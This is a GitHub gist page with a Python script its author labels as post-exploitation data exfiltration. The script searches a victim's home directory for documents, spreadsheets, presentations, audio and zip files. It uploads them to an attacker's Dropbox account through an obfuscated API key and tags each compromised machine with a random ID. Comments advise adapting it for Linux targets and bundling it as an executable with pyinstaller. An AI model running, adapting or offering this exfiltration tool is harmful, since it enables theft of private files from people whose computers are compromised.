Created
October 3, 2017 17:58
-
-
Save JohnTroony/8c2eb4e88dcac3ace9c9cd420abb44ac to your computer and use it in GitHub Desktop.
Python Script Post Exploitation Activities (Data Exfiltration where network bandwidth is limited but Dropbox is allowed).
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# -*- coding: utf-8 -*- | |
""" | |
@author: John Ombagi | |
""" | |
import os | |
import sys | |
import base64 | |
import dropbox | |
import time | |
import random | |
from dropbox.files import WriteMode | |
from dropbox.exceptions import ApiError, AuthError | |
#time.sleep(60) | |
# Here > Add your Base64 Encoded Dropbox API Key | |
apikey = "d2otaXpleD.....Gdl80Mj==" | |
# Base64 Decoded API key | |
TOKEN = base64.b64decode(apikey) | |
# Random UID Generator | |
def UID(length): | |
return ''.join( | |
random.choice('abcdefghijklmnopqrstuvwxyz') | |
for i in range(length) | |
) | |
# Random ID for file upload | |
# If you have mutiple clients, they will all have unique IDs | |
stampID = "/"+UID(9) | |
def backup(foundfile): | |
'''Uploads contents of LOCALFILE to Dropbox''' | |
DBXpath = stampID + foundfile.strip("C://").replace("\\", "/") | |
with open(foundfile, 'rb') as f: | |
try: | |
dbx.files_upload(f.read(), DBXpath, mode=WriteMode('overwrite')) | |
except ApiError as err: | |
print err | |
def seeker(ext): | |
'''Function to search Local computer for files to upload''' | |
path = os.getenv("HOME") | |
try: | |
for dirpath, dirname, files in os.walk(path): | |
for one_file in files: | |
if one_file.endswith(ext): | |
foundFile = os.path.join(dirpath, one_file) | |
backup(foundFile) | |
except Exception as error: | |
print(str(error)) | |
pass | |
# Program Starts here | |
dbx = dropbox.Dropbox(TOKEN) | |
# Key destroyed or exists? | |
try: | |
dbx.users_get_current_account() | |
except AuthError as err: | |
print("Auth Error") | |
sys.exit() | |
# File-types to search | |
to_be_mined = ( | |
".pdf", ".doc", ".docx", ".xls", ".xlsx", | |
".csv", ".ppt", ".pptx", ".wav", ".zip" | |
) | |
# Get em Files | |
for gold_nugget in to_be_mined: | |
seeker(gold_nugget) | |
# time.sleep(3600) |
For Linux targets:
You should remove the strip
and replace
functions on variable DBXpath
on line 39.
DBXpath = stampID + foundfile
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
**Tip : you can bundle the script as an executable for the target host. Works perfectly fine for Linux Binaries using pyinstaller.
Figuring out for Windows.